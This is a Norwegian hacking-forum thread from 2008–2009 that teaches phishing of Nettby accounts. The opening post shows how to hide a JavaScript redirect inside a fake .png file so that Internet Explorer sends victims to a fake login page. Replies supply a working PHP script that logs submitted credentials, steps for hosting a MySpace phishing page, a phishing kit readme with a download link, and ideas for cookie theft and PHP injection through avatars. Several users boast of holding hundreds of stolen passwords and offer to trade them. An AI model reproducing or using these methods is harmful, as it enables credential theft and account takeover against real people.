Nettby-Phishing Datasikkerhet

7. mars 2008

NB:
Jeg kan ikke bli holdt ansvarlig for låste brukere,
eller hva det skulle være.
Aldri brukt dette til å stjele sensetiv informasjon selv.
Gjør det på eget ansvar.

Introduksjon:

I denne videoen på milw0rm av
PHCKSEC -http://phcksec.org/
vises det et eksempel på å legge javascript i en .png fil.
IE verfiserer ikke bildefilen før den kjører den, i motsetning til Fx.
Dvs. at vi kan legge javascript i bildefilen, og alle som åpner den i IE vil kjøre scriptet.
Ved å redirecte de som åpner filen til en falsk nettby-login, kan vi høste inn passord.

Lage bildefilen:

PNG Header Format
Se:http://mindprod.com/jgloss/png.html

Så da må vi lage en fil med fil-etternavn .png, og png header.
Lag en ny fil i feks. Notepad om du bruker Windows, og kall den
for et eller annet.png. Bruk gjerne et "lokkende" filnavn
så offeret biter lettere på.

Her er hvordan filen kan se ut:
------------------------------------------------------------

89504E470D0A1A0A
0x0000000D
0x49484452
0x0000000D
0x0000000D
<html><body><script>window.location="http://www.google.com/";</script></body></html>

------------------------------------------------------------

Hvis du laster opp filen til nettby under "Filer" og åpner den i IE, så vil du bli
videresendt til google.com som du ser.
Istedet for å sende offeret til google, sender du han/hun
selvfølgelig til den falske login siden din, hvor du snapper opp
det de prøver å logge inn med.
Uten å ha prøvd, vil jeg tro en del går på denne.

Om jeg har glemt noe, så si gjerne i fra.

edit:
Sende link til bilde, som feks:
"Sjekk dette da
http://img4.nettby.no/users/b/r/u/bruker/files/porno.png"

Sist endret av sFilez; 7. mars 2008 kl. 21:23. Grunn: Oppdatert tittel

Lulz

94 12

7. mars 2008

Fint å vite, men hva skal man med Nettby brukere?

Eneste er jo at man kan kødde med en kompis eller noe ^^

dadyd

756 139

7. mars 2008

Dette må da kunne brukes til enda mer enn å sende noen til en fake innloggingsside. Funker det ikke kanskje med en cookiefanger eller noe? Mer avanserte scriptkoder.

sFilez

Trådstarter

359 163

7. mars 2008

Sitat av dadyd

Dette må da kunne brukes til enda mer enn å sende noen til en fake innloggingsside. Funker det ikke kanskje med en cookiefanger eller noe? Mer avanserte scriptkoder.

Vis hele sitatet...

Ja, du kan kjøre hva du vil, nettby og pishing var bare et eksempel.

cromoglic

425 5

7. mars 2008

Hmm... Må man ikke først og fremst ha en falsk loginside da, som logger inntastinger (username/password) og mailer til deg?

dadyd

756 139

7. mars 2008

Man må ha det, jo. I tillegg er dette ganske risikabelt om man ikke er flink til å skjule seg selv. Phishing er noe av det Kripos faktisk prioriterer.

cromoglic

425 5

7. mars 2008

Meen, på det eksemplet sFilez lagde...

"89504E470D0A1A0A
0x0000000D
0x49484452
0x0000000D
0x0000000D
<html><body><script>window.location="http://www.google.com/";</script></body></html>"

Det funka ikke... jeg lagra bare det i notepad som blablabla.png, for å prøve. Fikk ikke opp google!

Offtopic: kan man skjule bat-script i .png-filer`?

dadyd

756 139

7. mars 2008

Lagre fila som ettellerannet.png, legg den opp på en webserver og åpne linken i IE.

Bare test her:
http://home.no.net/dadyd/ppp.png

catolh

1.367 21

7. mars 2008

Bildet “http://home.no.net/dadyd/ppp.png” inneholder feil, og kan derfor ikke vises.

i firefox altså, IE sender meg til google.

Sist endret av catolh; 7. mars 2008 kl. 23:57.

sFilez

Trådstarter

359 163

7. mars 2008

Sitat av catolh

Bildet “http://home.no.net/dadyd/ppp.png” inneholder feil, og kan derfor ikke vises.

Vis hele sitatet...

Brukte du IE når du åpnet det?
Som sagt er det kun IE som er dum nok til å kjøre det.

Matmeg?

80 83

8. mars 2008

IE eat's it like a bitch....

Hadde tenkt å skrive en liten tråd på dette jeg å, ettersom så alt for mange tror at å kjøre scripts ved hjelp av bilder/bildefiler ikke er mulig. Men der var det altså gjort.

Vurderer KP, men bare om du finner ut hvordan man kan få lastet opp en avatar her på forumet med ett lite script

Dyret

1.916 1.753

8. mars 2008

En annen variant av dette er for sider som tillater ekstern lenking til avatarer. Der kan du rett og slett skrive en mod_rewrite-regel for å redirecte mysite.com/bilde.jpg til mysite.com/evilscript.php etter at bildet faktisk har gått gjennom godkjenning (via f.eks. manuell godkjenning eller sjekking av mimetype). På den måten kan man faktisk i visse tilfeller injecte php-kode.

Sist endret av Dyret; 8. mars 2008 kl. 00:20.

Matmeg?

80 83

8. mars 2008

Forresten, du får KP. Dette fungerer jo på it's learning

Setter opp phishing side nå

Restyle

exquisite

4.700 1.391

8. mars 2008

Sitat av Matmeg?

Forresten, du får KP. Dette fungerer jo på it's learning

Setter opp phishing side nå

Vis hele sitatet...

Lyst til å dele den med oss? ;D

Edit: Er ganske grønn på dette området, men lyst til å lære mer.

Hvordan skal man hente ut informasjonen, altså hvordan man får selve passordene/brukernavnet i hånden?

Helt enkelt forklart, så jeg vet hva jeg skal google og lese om. Takk =)

Sist endret av Restyle; 8. mars 2008 kl. 14:22.

Matmeg?

80 83

8. mars 2008

Ganske grønn selv, men tror jeg skal greie å sette opp en side iløpet av kvelden. Om det ikke blir fest da seff...

Uansett, her er det jeg kan fra før. (Hadde lagret på PC'en

)
Satte opp en myspace phishing side for noen måneder siden. Lagret www.myspace.com som login.html,
og en fil som jeg gav navnet data.txt

foreach($_POST as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "rn");
}
fwrite($handle, "rn");
fclose($handle);
exit;

Vis hele sitatet...

Deretter brukte jeg scriptet:

<?php
header("Location: ettellerannetsted.html");
$handle = fopen("data.txt", "a");
foreach($_POST as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "rn");
}
fwrite($handle, "rn");
fclose($handle);
exit;
?>

Vis hele sitatet...

HVOR ettelerannetsted er siden du blir redirektert til når du skriver inn FEIL passord eller brukernavn.
Lagre dette som log.php

Last opp data.txt og log.php på en freehost som lar deg bruke php.

Så åpner du login.html i notepad. Søker etter <form action="ett eller annet filnavn ">
Bytt ut "ett eller annet filnavn " med linken til log.php som da kan bli feks. http://www.freehost.com/lol/log.php
Last da login.html opp på en annen side enn den du lastet opp data.txt og log.php

Test det, og sjekk data.txt FRA web siden den er lastet opp på om det fungerer.

Men dette er altså for MySpace. Men med litt logisk tankegang hjelper dette deg på vei til å phishe andre sider

PM meg om du trenger hjelp eller dette var sinnsykt overfladisk eller umulig å forstå.

Sist endret av Matmeg?; 8. mars 2008 kl. 15:36.

Restyle

exquisite

4.700 1.391

8. mars 2008

Sitat av Matmeg?

Men dette er altså for MySpace. Men med litt logisk tankegang hjelper dette deg på vei til å phishe andre sider

PM meg om du trenger hjelp eller dette var sinnsykt overfladisk eller umulig å forstå.

Vis hele sitatet...

Forsto endel av det, takker så mye!
KP.

▼ ... over en uke senere ... ▼

mogroto

9 1

20. mars 2008

Haha, funker på IE7.0. Men klarer du å kjøre javascript på profilsiden din?

Sist endret av mogroto; 20. mars 2008 kl. 05:00.

masac

117 13

20. mars 2008

Sitat av sFilez

Brukte du IE når du åpnet det?
Som sagt er det kun IE som er dum nok til å kjøre det.

Vis hele sitatet...

Dette har eksistert en stund, og om du kjører med lave/teite sikkerhetsinnstillinger i IE7.0 fungerer dette ja..prøv å kjør bildefilen med sikkerhetsinnstillingene i IE på topp, så skal du se at det faktisk ikke fungerer lenger. Du kan også forhindre dette ved å sette opp et custom sikkerhetsnivå. Men artig post, takk.

Al Capone =D

80 9

21. mars 2008

Sitat av sFilez

Istedet for å sende offeret til google, sender du han/hun
selvfølgelig til den falske login siden din, hvor du snapper opp
det de prøver å logge inn med.

Vis hele sitatet...

Falske login sider

shitrich

276 100

21. mars 2008

Genialt (Y)

Cadex

Fittesatananarkikommando

1.436 756

21. mars 2008

Nyt det så lenge dere kan

Lanjelin

1d8+5+4d6

1.397 535

21. mars 2008

Visse side takler også at en bruker .php sider som bilde, og da er det mulig å bruke dette "bildet" til å snappe opp cookies. Har testet det på nettby, og det fungerte fint der, eneste var jeg greide ikke logge inn med bruk av cookies hvis ikke jeg var på samme eksterne ip-adresse som de jeg prøvde å logge inn som.

Al Capone =D

80 9

21. mars 2008

Får ikke det til å funke

Hvor blir brukernavnet og passordet lagret ?

add meg på papperboys_Fan92@hotmail.com trenger hjelp til det

Sist endret av DXT; 21. mars 2008 kl. 12:37.

▼ ... over et år senere ... ▼

negard

36 5

29. mai 2009

det er en supersimpel måte å phise nettby på. Jeg har lagd en metode selv en baby kan bruke.

http://dump.no/files/aefff288a27a/ref.7z

prøv selv om du vil ;D

throwaway72

1.813 199

29. mai 2009

Sitat av sFilez

Brukte du IE når du åpnet det?
Som sagt er det kun IE som er dum nok til å kjøre det.

Vis hele sitatet...

Er ikke kun IE som er dum nok til å kjøre det, min firefox sente meg til www.start.no

olli408

759 247

29. mai 2009

Sitat av fomox

Er ikke kun IE som er dum nok til å kjøre det, min firefox sente meg til www.start.no

Vis hele sitatet...

Det gjorde Opera også

negard

36 5

29. mai 2009

hmmm

noe rart skjedde med dump.no

her: http://www.mediafire.com/?sharekey=d...4e75f6e8ebb871

hayer

806 147

1. juni 2009

negard @ hva ligger i de filene? Tør ikke laste ned før jeg er tilbake på ubuntu igjen, men nyskjerrigheten dreper meg ;p

▼ ... noen uker senere ... ▼

negard

36 5

22. juni 2009

hva som ligger der? php filer?

▼ ... over en uke senere ... ▼

Kosy

334 4

6. juli 2009

"falske login siden" som man får fra..?

boblesaft

2.191 782

6. juli 2009

Sitat av Kosy

"falske login siden" som man får fra..?

Vis hele sitatet...

Phishing var bare et eksempel på hva man kan gjøre. Den falske login-siden må man selvfølgelig lage selv, eller få andre til å lage for deg.

negard

36 5

7. juli 2009

*tatt fra readMe*

skaff deg en webhost med php og mysql.
skriv dette i mysql

CREATE TABLE users (
username varchar(30),
password varchar(32));

så laster du opp alle filene og mappene.
endre database i både admin mappa og hovedmappa til dine databaser.

nå bør du sette passord på admin mappa.

gå inn på domenet ditt og prøv å logg inn, du blir sendt til loggen.

gå til admin mappa og se om det du skrev havnet der,hvis ikke har du gjort noe feil.

''''''''''''''''''''''''''
i profilen(e) skal du legge inn det som står i profil.txt. Du må max for å plassere css koder.

NOTE: denne er lagd for IE,fordi at kodne ikke vises likt i IE og i FireFox.
IE er mest utbred og da det logiske valget hvis du vil ha flere passord.

www.co.cc for ett co.cc domene. det kan være hjelpsomt og gratis.

boblesaft

2.191 782

7. juli 2009

Å bruke mysql til dette synes jeg blir litt overkill. Skriving til fil, eller få login-informasjon tilsendt på mail holder i massevis.

negard

36 5

12. juli 2009

Sitat av boblesaft

Å bruke mysql til dette synes jeg blir litt overkill. Skriving til fil, eller få login-informasjon tilsendt på mail holder i massevis.

Vis hele sitatet...

å[r du kjører nettbyll på profilene du har det på så kan du få inn over 100 passord på 10 min,

jeg vil IKKE ha hundre emails om passwords.

skriving til fil går vel, men de fleste free webhosts støtter ikke det ;P

derfor er en liste mye mye bedre.

(og om du bruker det kan du jo endre det til skriving av fil istedet?)

Sist endret av negard; 12. juli 2009 kl. 03:38. Grunn: glemte av en ting :P

SkyMarshal

Mannen i gata.

1.590 813

12. juli 2009

Folk som fortsatt bruker IE kan du vel nesten gjette passordet til allerede?

negard

36 5

13. juli 2009

Sitat av SkyMarshal

Folk som fortsatt bruker IE kan du vel nesten gjette passordet til allerede?

Vis hele sitatet...

ikke egentlig

og ja, jeg fant ut hvordan du får det til å virke på firefox uansett..

bare skrive samme koden med # foran så virker den på IE og den andre på ff

@nonym

64 4

15. juli 2009

Noen som fortsatt er intressert i en Itslearning-phisher?
Jeg har en liggende som jeg gjerne laster opp med guide.

Okey, viste seg at min phisher er unik for min skole, jeg kan heller lage en guide for hvordan man lager itslearning phisher fra bunnen av?

Sist endret av @nonym; 15. juli 2009 kl. 20:56. Grunn: Automatisk sammenslåing med etterfølgende innlegg.

Hanzen91

39 1

18. juli 2009

Hadde vært morro å fått detta til å funke da

Men finnes det ikke noen enklere måte en å bruke mysql da? : P

Skjønner ingenting av det.. >.<

▼ ... over en uke senere ... ▼

negard

36 5

29. juli 2009

Sitat av Hanzen91

Hadde vært morro å fått detta til å funke da

Men finnes det ikke noen enklere måte en å bruke mysql da? : P

Skjønner ingenting av det.. >.<

Vis hele sitatet...

går sikkert å bruke skriving til fil, men jeg lagde det i mysql fordi...

Det er så JÆVLA enkelt.

▼ ... noen uker senere ... ▼

Taffer

Taffer'n

176 37

21. august 2009

Har drevet med nettby-phishing en god stund nå, har rundt en 100 nettby brukere+passord som jeg skaffet for ca. ett halvt år siden.
Tenkte jeg skulle "deface" dem ved bruk av ett hjemmelaget program, men fekk ikke det til å funke så jeg bare droppa det^^
Har brukerne enda fortsatt, visst noen har lyst å bytte de mot noe som helst, PM!

Ondskap

1.803 675

21. august 2009

Sitat av Taffer

Vis hele sitatet...

Ser ingenting nyttig i å ha en drøss med passord til randoms på nettby?
Hva skal man bruke de til?

Eneste er jo å spam'e profil'n med 1k "hacked, haxxor, hax2k" bilder.
Ganske kjedelig å ubrukelig, for de endrer bare det dagen etter, med mindre du bytter passord på profilen.

Taffer

Taffer'n

176 37

21. august 2009

Skjønner, vet ikke hva jeg skal gjøre med de heller, derfor jeg spør om noen har nytte av de^^

Ondskap

1.803 675

22. august 2009

Skjønner, var helt gira på det før... Er jo litt moro/spennende.

Men nå liksom, så er det ikke så moro som i starten:P
Er bare mange unyttige tall/bokstavrekker man ikke har nytte av vist man ikke selv eier profilen

Taffer

Taffer'n

176 37

22. august 2009

Helt enig^^
Men bruker iblandt å logge på brukerne med Proxy eller VPN bare for å skrive kødde til kompissne :P

kosepaa

Ski for your life

1.152 109

22. august 2009

Rett før WotLK kom til WoW kom jeg over en side som kjørte noe lignende. Så ut som en helt vanlig blizz-side der man da skulle skrive account name og pass, så skulle man få beta-key. Var jo selvfølgelig en del folk som signet opp for dette og fikk accounten tømt og characterne slettet.

Maol33t

1.524 434

22. august 2009

Sitat av kosepaa

Vis hele sitatet...

Finnes hundre/tusenvis av slike nettsider. Ingenting nytt.

▼ ... over en uke senere ... ▼

negard

36 5

2. september 2009

Sitat av Taffer

Vis hele sitatet...

bare 100? ;|

har snart tusen....men sikkert mnge dupes/og passord forandret

problemmet er å finen ut hva i svarte man skal med dem...er ikke så slem at jeg kjøper max til meg selv

Taffer

Taffer'n

176 37

6. september 2009

Jeg har en ide

Hva om vi legger sammen alle vi har skaffet, sender dem inn til nettby byvaktene å si at de suger ku-baller? (:

oom

mlm

1.712 849

6. september 2009

Sitat av Taffer

Jeg har en ide

Hva om vi legger sammen alle vi har skaffet, sender dem inn til nettby byvaktene å si at de suger ku-baller? (:

Vis hele sitatet...

Dette er vel en av de bedre ideene jeg har lest.
Det er ikke noe poeng å sitte å ruge på tusenvis brukernavn/passord og det er ihvertfall tåpelig å ødelegge for andre.
Gratulerer, dere har fått det til! Dere har lært en noe nytt. Bruk det på gode ting og ikke for å ødlegge for andre. Det er bare teit.

Kontakt nettby og fortell de om deres feil og send gjerne ved en god liste med brukernavn/passord. Det er det det står respekt av.

Pass forresten på, de kan fort begynne å anklage deg for å hacket de etc.